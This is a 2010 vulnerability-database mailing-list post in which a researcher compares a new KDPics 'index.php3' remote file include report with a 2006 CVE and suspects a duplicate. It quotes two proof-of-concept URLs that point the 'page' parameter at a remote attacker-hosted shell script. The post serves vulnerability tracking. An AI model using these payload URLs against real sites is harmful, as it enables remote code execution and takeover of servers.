[VIM] KDPics 'index.php3' Remote File Include Vulnerability
George A. Theall
theall at tenable.com
Mon Aug 9 09:15:21 CDT 2010
Bugtraq 42312 was just released to cover a remote file include in
KDPics version 1.11, apparently reported by Fl0riX and covered by
http://packetstormsecurity.nl/1008-exploits/kdpics-rfi.txt. The PoC
looks similar to one reported by Mr_KaLiMaN in 2006 and covered by
CVE-2006-6516 / Bugtraq 21515 / OSVDB 31868:

  site/index.php3?page=http://fl0rix/shell.txt?

versus:

  http://[victim]/[kdpics_path]/index.php3?page=http://evil_script.txt?

Looks like another dup to me. Rob?
George
--
theall at tenablesecurity.com